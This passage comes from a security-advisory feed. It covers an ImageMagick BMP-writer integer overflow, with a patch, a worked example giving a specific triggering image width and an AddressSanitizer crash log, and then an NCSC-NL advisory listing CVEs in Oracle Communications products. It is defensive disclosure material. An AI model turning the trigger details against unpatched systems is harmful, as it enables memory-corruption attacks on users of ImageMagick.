((size_t)image-\u003erows == 0)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\n/* biSizeImage = rows * bytes_per_line (DIB field is 32-bit) */\nif (bytes_per_line \u003e 0xFFFFFFFFu / (size_t)image-\u003erows)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\nbmp_info.image_size = (unsigned int)(bytes_per_line * (size_t)image-\u003erows);\n\n/* Allocation count = rows * stride_used, with existing MagickMax policy. */\nsize_t _stride = MagickMax(bytes_per_line, (size_t)image-\u003ecolumns + 256UL);\nif (_stride \u003e SIZE_MAX / (size_t)image-\u003erows)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\n\npixel_info = AcquireVirtualMemory((size_t)image-\u003erows, _stride * sizeof(*pixels));\nif (pixel_info == (MemoryInfo *) NULL)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\npixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);\n\n/* Optional: keep zeroing aligned to computed header size. */\n(void) memset(pixels, 0, (size_t) bmp_info.image_size);\n\n/* --- PATCH END --- */\n```\n\n### Why this is the right spot?\n\n- It\u00a0**replaces**\u00a0the unguarded stride line you currently have, without changing the algorithm (still\u00a0`4*((W*bpp+31)/32)`).\u00a0\n \n- It\u00a0**fixes the header**\u00a0(`biSizeImage`) to be a checked product, instead of a potentially wrapped multiplication.\u00a0\n \n- It\u00a0**guards allocation**\u00a0where you presently allocate\u00a0`rows \u00d7 MagickMax(bytes_per_line, columns+256)`.\u00a0\n \n- The invariant\u00a0`row_bytes \u2264 bytes_per_line`\u00a0ensures your 24-bpp emission loop (writes 3 bytes/pixel, then pads to\u00a0`bytes_per_line`) can never exceed the per-row slot the code relies on.\u00a0\n \n\n---\n\n## Notes\n\n- **Behavior preserved**: The stride value for normal images is unchanged; only pathological integer states are rejected.\u00a0\n \n- **Header consistency**:\u00a0`biSizeImage = rows * bytes_per_line`\u00a0remains true by construction, but now cannot overflow a 32-bit DIB field.\u00a0\n \n- **Defensive alignment**: If you prefer, you can compute\u00a0`bytes_per_line`\u00a0as\u00a0`((row_bytes + 3) \u0026 ~3U)`; it\u2019s equivalent and may read clearer, but I kept the original formula with guards to minimize diff.\n \n\nA slightly larger \u201chelpers\u201d variant (with\u00a0`safe_mul_size`\u00a0/\u00a0`safe_add_size`\u00a0utilities) also comes to mind, but the block above is the tightest patch that closes the 32-bit IOF\u2192OOB class without touching unrelated code paths.\n\n\n\n### Appendix B \u2014 Arithmetic Worked Example (W=178,957,200)\n\n- `(24W + 31) mod 2^32 = 5535`\n \n- `bytes_per_line = 4 * (5535/32) = 688`\n \n- `row_bytes (24-bpp) = 536,871,600`\n \n- Allocation via\u00a0`MagickMax = 178,957,456`\u00a0\u2192 immediate row 0 out-of-bounds.\n \n\n### Appendix C \u2014 Raw ASan Log (trimmed)\n\n```\n=================================================================\n==49178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490\nWRITE of size 1 at 0x6eaac490 thread T0\n #0 0xed2788 in WriteBMPImage coders/bmp.c:2309\n #1 0x13da32c in WriteImage MagickCore/constitute.c:1342\n #2 0x13dc657 in WriteImages MagickCore/constitute.c:1564\n0x6eaac490 is located 0 bytes to the right of 178957456-byte region\nallocated by thread T0 here:\n #0 0x408e30ab in __interceptor_posix_memalign\n #1 0xd03305 in AcquireVirtualMemory MagickCore/memory.c:747\n #2 0xecd597 in WriteBMPImage coders/bmp.c:2092\n```",
"id": "GHSA-mxvv-97wh-cfmm",
"modified": "2025-08-26T20:44:57Z",
"published": "2025-08-26T16:07:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57803"
},
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7"
},
{
"type": "PACKAGE",
"url": "https://github.com/ImageMagick/ImageMagick"
},
{
"type": "WEB",
"url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride \u2192 heap buffer overflow"
}
ncsc-2025-0330
Vulnerability from csaf_ncscnl
Notes
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "Oracle heeft meerdere kwetsbaarheden verholpen in zijn Communications producten, waaronder de Unified Assurance en Cloud Native Core.",
"title": "Feiten"
},
{
"category": "description",
"text": "De kwetsbaarheden in de Oracle Communications producten stellen kwaadwillenden in staat om ongeautoriseerde toegang te verkrijgen, wat kan leiden tot gedeeltelijke of volledige Denial-of-Service (DoS) aanvallen. Specifiek kunnen aanvallers met netwerktoegang de systemen compromitteren, wat resulteert in ongeautoriseerde toegang tot gevoelige gegevens. De CVSS-scores van deze kwetsbaarheden vari\u00ebren van 3.1 tot 9.8, wat wijst op een breed scala aan risico\u0027s, van beperkte tot ernstige impact op de vertrouwelijkheid, integriteit en beschikbaarheid van de systemen.",
"title": "Interpretaties"
},
{
"category": "description",
"text": "Oracle heeft updates uitgebracht om de kwetsbaarheden in zijn Communications producten te verhelpen. Zie bijgevoegde referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "general",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "general",
"text": "Relative Path Traversal",
"title": "CWE-23"
},
{
"category": "general",
"text": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"title": "CWE-94"
},
{
"category": "general",
"text": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"title": "CWE-120"
},
{
"category": "general",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
},
{
"category": "general",
"text": "Heap-based Buffer Overflow",
"title": "CWE-122"
},
{
"category": "general",
"text": "Buffer Underwrite (\u0027Buffer Underflow\u0027)",
"title": "CWE-124"
},
{
"category": "general",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "general",
"text": "Improper Validation of Array Index",
"title": "CWE-129"
},
{
"category": "general",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
},
{
"category": "general",
"text": "Improper Neutralization of Input Terminators",
"title": "CWE-147"
},
{
"category": "general",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "general",
"text": "Numeric Truncation Error",
"title": "CWE-197"
},
{
"category": "general",
"text": "Improper Handling of Unexpected Data Type",
"title": "CWE-241"
},
{
"category": "general",
"text": "Unchecked Return Value",
"title": "CWE-252"
},
{
"category": "general",
"text": "Incorrect Check of Function Return Value",
"title": "CWE-253"
},
{
"category": "general",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "general",
"text": "Improper Authentication",
"title": "CWE-287"
},
{
"category": "general",
"text": "Authentication Bypass by Spoofing",
"title": "CWE-290"
},
{
"category": "general",
"text": "Use of Weak Hash",
"title": "CWE-328"
},
{
"category": "general",
"text": "Covert Timing Channel",
"title": "CWE-385"
},
{
"category": "general",
"text": "Detection of Error Condition Without Action",
"title": "CWE-390"
},
{
"category": "general",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "general",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "general",
"text": "Inefficient Algorithmic Complexity",
"title": "CWE-407"
},
{
"category": "general",
"text": "Improper Handling of Highly Compressed Data (Data Amplification)",
"title": "CWE-409"
},
{
"category": "general",
"text": "Double Free",
"title": "CWE-415"
},
{
"category": "general",
"text": "Use After Free",
"title": "CWE-416"
},
{
"category": "general",
"text": "Untrusted Search Path",
"title": "CWE-426"
},
{
"category": "general",
"text": "Expected Behavior Violation",
"title": "CWE-440"
},
{
"category": "general",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "general",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
},
{
"category": "general",
"text": "Uncontrolled Recursion",
"title": "CWE-674"
},
{
"category": "general",
"text": "Incorrect Comparison",
"title": "CWE-697"
},
{
"category": "general",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "general",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "general",
"text": "Memory Allocation with Excessive Size Value",
"title": "CWE-789"
},
{
"category": "general",
"text": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"title": "CWE-835"
},
{
"category": "general",
"text": "Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)",
"title": "CWE-843"
},
{
"category": "general",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
},
{
"category": "general",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "general",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "general",
"text": "Improper Validation of Specified Quantity in Input",
"title": "CWE-1284"
},
{
"category": "general",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Reference",
"url": "https://www.oracle.com/security-alerts/cpuoct2025.html"
}
],
"title": "Kwetsbaarheden verholpen in Oracle Communications producten",
"tracking": {
"current_release_date": "2025-10-23T13:20:15.363063Z",
"generator": {
"date": "2025-08-04T16:30:00Z",
"engine": {
"name": "V.A.",
"version": "1.3"
}
},
"id": "NCSC-2025-0330",
"initial_release_date": "2025-10-23T13:20:15.363063Z",
"revision_history": [
{
"date": "2025-10-23T13:20:15.363063Z",
"number": "1.0.0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-1"
}
}
],
"category": "product_name",
"name": "Communications Cloud Native Core Console"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-2"
}
}
],
"category": "product_name",
"name": "Management Cloud Engine"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-3"
}
}
],
"category": "product_name",
"name": "Oracle Communications Billing and Revenue Management"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-4"
}
}
],
"category": "product_name",
"name": "Oracle Communications Calendar Server"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-5"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Automated Test Suite"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-6"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Binding Support Function"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-7"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Certificate Management"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-8"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core DBTier"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-9"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Network Function Cloud Native Environment"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-10"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Network Repository Function"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-11"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Network Slice Selection Function"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-12"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Policy"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-13"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Security Edge Protection Proxy"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-14"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Service Communication Proxy"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-15"
}
}
],
"category": "product_name",
"name": "Oracle Communications Cloud Native Core Unified Data Repository"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-16"
}
}
],
"category": "product_name",
"name": "Oracle Communications Converged Charging System"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-17"
}
}
],
"category": "product_name",
"name": "Oracle Communications Convergence"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-18"
}
}
],
"category": "product_name",
"name": "Oracle Communications Convergent Charging Controller"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-19"
}
}
],
"category": "product_name",
"name": "Oracle Communications Diameter Signaling Router"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-20"
}
}
],
"category": "product_name",
"name": "Oracle Communications EAGLE Element Management System"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-21"
}
}
],
"category": "product_name",
"name": "Oracle Communications EAGLE LNP Application Processor"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-22"
}
}
],
"category": "product_name",
"name": "Oracle Communications LSMS"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-23"
}
}
],
"category": "product_name",
"name": "Oracle Communications Messaging Server"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-24"
}
}
],
"category": "product_name",
"name": "Oracle Communications Network Analytics Data Director"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-25"
}
}
],
"category": "product_name",
"name": "Oracle Communications Network Charging and Control"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-26"
}
}
],
"category": "product_name",
"name": "Oracle Communications Network Integrity"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-27"
}
}
],
"category": "product_name",
"name": "Oracle Communications Offline Mediation Controller"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-28"
}
}
],
"category": "product_name",
"name": "Oracle Communications Operations Monitor"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-29"
}
}
],
"category": "product_name",
"name": "Oracle Communications Order and Service Management"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-30"
}
}
],
"category": "product_name",
"name": "Oracle Communications Pricing Design Center"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-31"
}
}
],
"category": "product_name",
"name": "Oracle Communications Service Catalog and Design"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-32"
}
}
],
"category": "product_name",
"name": "Oracle Communications Session Border Controller"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-33"
}
}
],
"category": "product_name",
"name": "Oracle Communications Unified Assurance"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-34"
}
}
],
"category": "product_name",
"name": "Oracle Communications Unified Inventory Management"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-35"
}
}
],
"category": "product_name",
"name": "Oracle Enterprise Communications Broker"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-36"
}
}
],
"category": "product_name",
"name": "Oracle Enterprise Operations Monitor"
}
],
"category": "vendor",
"name": "Oracle"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-26555",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "description",
"text": "Recent updates address vulnerabilities in NTP 4.2.8p17 and Oracle products, including CVE-2023-26555 related to malformed RT-11 dates and various security issues in Oracle Communications and Database systems.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-26555 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2023/cve-2023-26555.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2023-26555"
},
{
"cve": "CVE-2024-7254",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Uncontrolled Recursion",
"title": "CWE-674"
},
{
"category": "description",
"text": "Multiple vulnerabilities across various Oracle, IBM, and Protobuf products could lead to Denial of Service and unauthorized access, with significant risks identified in versions of Oracle Communications, MySQL Connector/J, and IBM WebSphere.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-7254 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-7254.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-7254"
},
{
"cve": "CVE-2024-8006",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"notes": [
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
},
{
"category": "description",
"text": "Multiple vulnerabilities in Oracle Communications products and the libpcap library allow high-privileged attackers to cause denial of service and NULL pointer dereference issues, with CVSS scores of 4.4 for the former.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-8006 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-8006.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-8006"
},
{
"cve": "CVE-2024-12133",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Algorithmic Complexity",
"title": "CWE-407"
},
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "description",
"text": "Multiple vulnerabilities affecting Oracle Communications EAGLE LNP Application Processor, Oracle Communications Cloud Native Core Policy, and libtasn1 could lead to denial of service attacks, with CVSS scores of 5.3 for some products.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-12133 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-12133.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
